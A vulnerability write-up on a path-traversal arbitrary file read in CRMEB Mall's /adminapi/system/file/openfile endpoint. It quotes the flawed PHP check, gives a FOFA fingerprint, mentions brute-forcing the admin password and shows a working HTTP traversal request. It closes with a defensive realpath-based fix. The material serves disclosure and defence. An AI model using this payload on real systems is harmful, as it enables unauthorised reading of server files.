众邦科技 CRMEB Mall commercial version: arbitrary file read vulnerability
Source code: https://gitee.com/ZhongBangKeJi/CRMEB
Source owner: 众邦科技
Company website: https://www.crmeb.com/
fofa: icon_hash="-847565074"
Code audit

```php
public function openfile($filepath)
{
    // Site root directory
    $rootDir = $this->formatPath(app()->getRootPath());
    // Prevent viewing files outside the site
    if (strpos($filepath, $rootDir) === false || $filepath == '') {
        throw new AdminException('无法打开站点以外的文件');
    }
    $filepath = $this->formatPath($filepath);
    $content = FileClass::readFile($filepath); // Prevent an embedded textarea tag in the page
    $ext = FileClass::getExt($filepath);
    $encoding = mb_detect_encoding($content, mb_detect_order());
    // Language types supported by the front-end component
    // ['plaintext', 'json', 'abap', 'apex', 'azcli', 'bat', 'cameligo', 'clojure', 'coffeescript', 'c', 'cpp', 'csharp', 'csp', 'css', 'dart', 'dockerfile', 'fsharp', 'go', 'graphql', 'handlebars', 'hcl', 'html', 'ini', 'java', 'javascript', 'julia', 'kotlin', 'less', 'lexon', 'lua', 'markdown', 'mips', 'msdax', 'mysql', 'objective-c', 'pascal', 'pascaligo', 'perl', 'pgsql', 'php', 'postiats', 'powerquery', 'powershell', 'pug', 'python', 'r', 'razor', 'redis', 'redshift', 'restructuredtext', 'ruby', 'rust', 'sb', 'scala', 'scheme', 'scss', 'shell', 'sol', 'aes', 'sql', 'st', 'swift', 'systemverilog', 'verilog', 'tcl', 'twig', 'typescript', 'vb', 'xml', 'yaml']
    $extarray = [
        'js'    => 'javascript',
        'htm'   => 'html',
        'shtml' => 'html',
        'html'  => 'html',
        'xml'   => 'xml',
        'php'   => 'php',
        'sql'   => 'mysql',
        'css'   => 'css',
        'txt'   => 'plaintext',
        'vue'   => 'html',
        'json'  => 'json',
        'lock'  => 'json',
        'md'    => 'markdown',
        'bat'   => 'bat',
        'ini'   => 'ini',
    ];
    $mode = empty($extarray[$ext]) ? 'php' : $extarray[$ext];
    return compact('content', 'mode', 'filepath', 'encoding');
}

// The readFile function it calls goes straight to file_get_contents
public static function readFile(string $file)
{
    return @file_get_contents($file);
}
```
The vulnerable point: this code is intended to open only files under the site root directory, but the check can be bypassed with directory traversal:

```php
if (strpos($filepath, $rootDir) === false || $filepath == '') {
    throw new AdminException('无法打开站点以外的文件');
}
```

As long as the filepath string contains rootDir, strpos() does not return false, so the check passes and the path can step out of the matched directory to reach other sensitive files. The interface is: /adminapi/system/file/openfile

Vulnerability reproduction

Click File management as shown below to enter; the password can be brute-forced.
Once inside, click any file to edit it.
The absolute path appears in the captured packet.
The rootDir in the code is: C:\phpstudy_pro1\WWW\crmeb-master\CRMEB (it is usually supplied directly in the packets the front end sends, so it does not need to be guessed).
Construct a payload to read system.ini:

```http
GET /adminapi/system/file/openfile?filepath=C:\phpstudy_pro1\WWW\CRMEB-master\crmeb\..\..\..\..\Windows\system.ini&fileToken=a151c0055dd6ad351587ba743cd64bd0 HTTP/1.1
Host: 192.168.242.142:89
Accept: application/json, text/plain, */*
Authori-zation: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJwd2QiOiIwZmQ0Yjc1ZTA2Nzc5MjMwOTdlZThlNmQzYTdkZTQwMSIsImlzcyI6IjE5Mi4xNjguMjQyLjE0Mjo4OSIsImF1ZCI6IjE5Mi4xNjguMjQyLjE0Mjo4OSIsImlhdCI6MTcwNjk0OTQ5OCwibmJmIjoxNzA2OTQ5NDk4LCJleHAiOjE3MDk1NDE0OTgsImp0aSI6eyJpZCI6MSwidHlwZSI6ImFkbWluIn19.sz3bKZVjTcXJZAleAahllknbcQjgR-4kl9zWAJ4aybM
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Referer: http://192.168.242.142:89/admin/system/maintain/system_file/opendir
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: uuid=1; WS_ADMIN_URL=ws://192.168.242.142:89/notice; WS_CHAT_URL=ws://192.168.242.142:89/msg; cb_lang=zh-cn; PHPSESSID=7ead6c57e767cbd757d0154f40bd9bb5; token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJwd2QiOiIwZmQ0Yjc1ZTA2Nzc5MjMwOTdlZThlNmQzYTdkZTQwMSIsImlzcyI6IjE5Mi4xNjguMjQyLjE0Mjo4OSIsImF1ZCI6IjE5Mi4xNjguMjQyLjE0Mjo4OSIsImlhdCI6MTcwNjk0OTQ5OCwibmJmIjoxNzA2OTQ5NDk4LCJleHAiOjE3MDk1NDE0OTgsImp0aSI6eyJpZCI6MSwidHlwZSI6ImFkbWluIn19.sz3bKZVjTcXJZAleAahllknbcQjgR-4kl9zWAJ4aybM; expires_time=1709541498; file_token=a151c0055dd6ad351587ba743cd64bd0
Connection: close
```

You can see that directory traversal succeeds because the `..` segments are never filtered.
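The root cause is that the check in openfile() tests for the root path as a substring instead of comparing canonical paths. The following is an added example, not CRMEB's own code, that places the substring check beside a realpath()-based check and runs both against a constructed temporary site root; the directory layout and file names are assumptions made for the demonstration.

```php
<?php
// Added example (not CRMEB code): substring check from openfile() versus a
// canonicalising check. $rootDir and the sample paths are constructed below.

function isInsideRootSubstring(string $filepath, string $rootDir): bool
{
    // Mirrors the original check: passes whenever rootDir appears anywhere in the string
    return $filepath !== '' && strpos($filepath, $rootDir) !== false;
}

function isInsideRootCanonical(string $filepath, string $rootDir): bool
{
    // Resolve both paths to absolute, symlink-free, ".."-free form.
    // realpath() returns false when the path does not exist; treat that as "deny".
    $realRoot = realpath($rootDir);
    $realFile = realpath($filepath);
    if ($realRoot === false || $realFile === false) {
        return false;
    }
    $realRoot = rtrim($realRoot, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    // The resolved file must sit strictly beneath the resolved root
    return strncmp($realFile, $realRoot, strlen($realRoot)) === 0;
}

// Constructed sandbox: a temporary "site root" holding one file, plus a
// sibling file outside the root that a traversal would reach.
$base = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'crmeb_demo_' . uniqid();
$root = $base . DIRECTORY_SEPARATOR . 'site';
mkdir($root, 0700, true);
file_put_contents($root . DIRECTORY_SEPARATOR . 'index.php', "<?php\n");
file_put_contents($base . DIRECTORY_SEPARATOR . 'secret.ini', "[secret]\n");

$inside   = $root . DIRECTORY_SEPARATOR . 'index.php';
// Same shape as the request above: the root prefix followed by ".."
$traverse = $root . DIRECTORY_SEPARATOR . '..' . DIRECTORY_SEPARATOR . 'secret.ini';

foreach ([$inside, $traverse] as $p) {
    printf("%s\n  substring check: %s   canonical check: %s\n", $p,
        isInsideRootSubstring($p, $root) ? 'allow' : 'deny',
        isInsideRootCanonical($p, $root) ? 'allow' : 'deny');
}

// Cleanup of the constructed sandbox
unlink($inside);
unlink($base . DIRECTORY_SEPARATOR . 'secret.ini');
rmdir($root);
rmdir($base);
```

The substring check allows both paths, while the canonical check allows only index.php and denies the traversal to secret.ini; on the server side, a request whose filepath parameter contains `..` after the site root is also a simple signature worth alerting on.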